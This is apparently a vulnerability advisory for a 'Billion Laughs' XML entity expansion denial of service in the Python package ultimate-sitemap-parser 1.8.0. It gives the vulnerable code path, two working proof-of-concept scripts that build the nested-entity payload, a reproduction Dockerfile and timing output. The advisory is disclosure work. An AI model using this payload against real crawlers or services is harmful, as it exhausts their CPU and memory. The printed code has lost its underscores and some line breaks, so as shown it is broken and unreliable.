PT-2026-53793 · Pypi · Ultimate-Sitemap-Parser
Publicado
2026-06-19
·
Atualizado
2026-06-19
CVSS v3.1
7.5
Alta
| Vetor | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
XML Entity Expansion (Billion Laughs) DoS in XMLSitemapParser
Summary
ultimate-sitemap-parser version 1.8.0 and earlier parse attacker-controlled XML content using Python's xml.parsers.expat without any restriction on DTD declarations or recursive entity references. An attacker who can serve a malicious sitemap can trigger exponential XML entity expansion (the "Billion Laughs" attack), causing unbounded CPU and memory consumption in the victim process. No authentication, user interaction, or special configuration is required — the vulnerability is exploitable by default through any public-facing use of sitemap tree for homepage() or sitemap from str().Details
The vulnerable code path begins at the public API entry points and flows to the Expat XML parser without any sanitization:
usp/tree.py:42—sitemap tree for homepage(homepage url)is the primary public entry point.usp/tree.py:133—sitemap from str(content)is the secondary public entry point (also directly reachable from user code).usp/fetch parse.py:141-145—SitemapFetcher. fetch()retrieves the remote URL content.usp/fetch parse.py:175— The raw response becomesresponse content(taint propagation point).usp/fetch parse.py:441-450—XMLSitemapParser.sitemap()creates an Expat parser and feeds the attacker-controlled content directly to it:
python
# usp/fetch parse.py:441-450 — VULNERABLE SINK
parser = xml.parsers.expat.ParserCreate(
namespace separator=self. XML NAMESPACE SEPARATOR
)
# ... handler assignments ...
parser.Parse(self. content, is final) # <-- no DTD/entity restrictionA full audit of the
usp/ directory confirms that none of the following hardening measures are present:defusedxmlusage- DOCTYPE rejection
SetParamEntityParsingUseForeignDTDExternalEntityRefHandler
When a Billion Laughs payload is parsed, each nested entity reference is expanded recursively, multiplying the in-memory string by a factor of 10 per nesting level. At level 6 (10⁶ expansions), processing time exceeds 20 seconds, effectively hanging the calling process.
PoC
Environment setup:
bash
# Option A: install from PyPI
python -m venv /tmp/usp-poc
. /tmp/usp-poc/bin/activate
pip install ultimate-sitemap-parser==1.8.0bash
# Option B: Docker (using the provided Dockerfile)
docker build -t vuln-001-usp -f vuln-001/Dockerfile .
docker run --rm vuln-001-uspAttack payload and execution:
python
from usp.tree import sitemap from str
import time, signal
TIMEOUT = 20
class TimedOut(Exception): pass
def handler(s, f): raise TimedOut()
def build payload(level):
lines = ['<?xml version="1.0"?>', '<!DOCTYPE x [']
lines.append(' <!ENTITY lol "lol">')
for i in range(1, level + 1):
prev = "lol" if i == 1 else f"lol{i-1}"
expansion = "".join(f"&{prev};" for in range(10))
lines.append(f' <!ENTITY lol{i} "{expansion}">')
lines.append(']>')
lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
lines.append(f' <url><loc>http://example.com/&lol{level};</loc></url>')
lines.append('</urlset>')
return "
".join(lines)
for level in [3, 4, 5, 6]:
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
t = time.perf counter()
try:
result = sitemap from str(build payload(level))
elapsed = time.perf counter() - t
signal.alarm(0)
pages = list(result.all pages())
url len = len(pages[0].url) if pages else 0
print(f"Level {level}: {elapsed:.4f}s url len={url len:,}")
except TimedOut:
elapsed = time.perf counter() - t
signal.alarm(0)
print(f"Level {level}: TIMEOUT after {elapsed:.1f}s -- DoS confirmed")Expected output (observed during dynamic reproduction):
Level 3 (10^3): 0.0054s url len=3,019
Level 4 (10^4): 0.0321s url len=30,019
Level 5 (10^5): 5.2845s url len=300,019
Level 6 (10^6): TIMEOUT after 20.0011s -- DoS confirmedProcessing time grows exponentially: level 5 is ~165× slower than level 4, and level 6 exceeds the 20-second watchdog. This conclusively demonstrates unbounded resource consumption.
Impact
This is a Denial-of-Service (DoS) vulnerability via XML Entity Expansion (the "Billion Laughs" / CWE-776 pattern). Any application or service that uses
ultimate-sitemap-parser to crawl external or user-supplied URLs is impacted.Who is affected:
- Web crawlers and indexers that call
sitemap tree for homepage()against arbitrary URLs — a single malicious sitemap server can lock up the crawler process. - CI/CD pipelines and monitoring tools that periodically parse sitemaps as part of automated workflows.
- Any application that passes unvalidated user input to
sitemap from str().
Because no authentication, elevated privilege, or prior relationship is required (CVSS PR:N, UI:N), the attack surface is broad. An attacker only needs to operate a web server that returns a malicious sitemap when visited.
Reproduction artifacts
Dockerfile
dockerfile
FROM python:3.11-slim
LABEL description="VULN-001: XML Entity Expansion (Billion Laughs) DoS PoC"
target="GateNLP/ultimate-sitemap-parser <= 1.8.0"
cwe="CWE-776"
WORKDIR /app
# Copy the cloned repository first
COPY repo/ /app/repo/
# Install uv build (required build backend) then install the vulnerable package from the local clone
RUN pip install --no-cache-dir "uv build>=0.9.6,<0.10.0" &&
pip install --no-cache-dir /app/repo/
# Copy the PoC script
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "-u", "/app/poc.py"]poc.py
python
#!/usr/bin/env python3
"""
PoC for VULN-001: XML Entity Expansion (Billion Laughs) DoS
Affected: GateNLP/ultimate-sitemap-parser <= 1.8.0
CWE-776: Improper Restriction of Recursive Entity References in DTDs
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5 High)
Sink: usp/fetch parse.py:450
parser = xml.parsers.expat.ParserCreate(namespace separator=...)
parser.Parse(self. content, is final) <- no DTD/entity restriction
Entry: usp.tree.sitemap from str(content: str) -> AbstractSitemap
"""
import signal
import sys
import time
from usp.tree import sitemap from str
TIMEOUT SECONDS = 20
DOS THRESHOLD SECONDS = 2.0 # level 5 must exceed this to PASS
class TimedOut(Exception):
pass
def alarm handler(signum, frame):
raise TimedOut("SIGALRM fired")
def build billion laughs payload(level: int) -> str:
"""Build a Billion Laughs XML payload nested to `level` depth.
Each level multiplies expansion by 10:
level 3 -> 10^3 = 1,000 chars
level 4 -> 10^4 = 10,000 chars
level 5 -> 10^5 = 100,000 chars
level 6 -> 10^6 = 1,000,000 chars
"""
lines = ['<?xml version="1.0"?>', "<!DOCTYPE x ["]
lines.append(' <!ENTITY lol "lol">')
for i in range(1, level + 1):
prev = "lol" if i == 1 else f"lol{i - 1}"
expansion = "".join(f"&{prev};" for in range(10))
lines.append(f' <!ENTITY lol{i} "{expansion}">')
lines.append("]>")
lines.append('<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">')
lines.append(f" <url><loc>http://example.com/&lol{level};</loc></url>")
lines.append("</urlset>")
return "
".join(lines)
def parse with timeout(payload: str):
"""Parse payload under SIGALRM watchdog; return (elapsed, url len, timed out)."""
signal.signal(signal.SIGALRM, alarm handler)
signal.alarm(TIMEOUT SECONDS)
start = time.perf counter()
timed out = False
url len = 0
try:
result = sitemap from str(payload)
elapsed = time.perf counter() - start
signal.alarm(0)
pages = list(result.all pages())
if pages:
url len = len(pages[0].url)
except TimedOut:
elapsed = time.perf counter() - start
timed out = True
signal.alarm(0)
except Exception as exc:
elapsed = time.perf counter() - start
signal.alarm(0)
print(f" [EXCEPTION] {type(exc). name }: {exc}", flush=True)
return elapsed, url len, timed out
def main() -> int:
print("=" * 64)
print("VULN-001 XML Entity Expansion DoS (Billion Laughs)")
print("Target : GateNLP/ultimate-sitemap-parser <= 1.8.0")
print("Sink : usp/fetch parse.py:450 parser.Parse( content)")
print(f"Timeout: {TIMEOUT SECONDS}s per level")
print("=" * 64)
results = {}
for level in [3, 4, 5, 6]:
theoretical = 10**level
payload = build billion laughs payload(level)
print(
f"
[*] Level {level}: 10^{level} = {theoretical:>10,} chars "
f"payload bytes={len(payload)}",
flush=True,
)
elapsed, url len, timed out = parse with timeout(payload)
results[level] = (elapsed, url len, timed out)
if timed out:
print(
f"[!] Level {level}: TIMED OUT after {elapsed:.1f}s "
f"(>{TIMEOUT SECONDS}s) -- DoS confirmed",
flush=True,
)
else:
print(
f"[+] Level {level}: completed in {elapsed:.4f}s "
f"url len={url len:,}",
flush=True,
)
print("
" + "=" * 64)
print("TIMING SUMMARY")
print("=" * 64)
for lvl, (elapsed, url len, timed out) in results.items():
status = f"TIMEOUT >{TIMEOUT SECONDS}s" if timed out else f"{elapsed:.4f}s"
print(f" Level {lvl} (10^{lvl:>1}): {status:>20} url len={url len:,}")
print()
# Verdict: level 5 must take >2s or level 6 must time out
lvl5 elapsed, , lvl5 timed out = results.get(5, (0, 0, False))
lvl6 elapsed, , lvl6 timed out = results.get(6, (0, 0, False))
slow evidence = lvl5 elapsed > DOS THRESHOLD SECONDS or lvl5 timed out
timeout evidence = lvl6 timed out or lvl6 elapsed > DOS THRESHOLD SECONDS
if slow evidence or timeout evidence:
print("[PASS] DoS CONFIRMED: exponential CPU exhaustion via XML entity expansion")
print(
f" level-5 time={lvl5 elapsed:.4f}s level-6 "
+ ("TIMEOUT" if lvl6 timed out else f"time={lvl6 elapsed:.4f}s")
)
print("[PASS] CWE-776 Billion Laughs confirmed in ultimate-sitemap-parser <= 1.8.0")
return 0
else:
print("[FAIL] Timing did not show significant slowdown -- DoS not confirmed")
print(f" level-5={lvl5 elapsed:.4f}s level-6={lvl6 elapsed:.4f}s")
print(" (expected level-5 > 2s or level-6 to time out)")
return 1
if name == " main ":
sys.exit(main())Correção
XML Entity Expansion
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Ultimate-Sitemap-Parser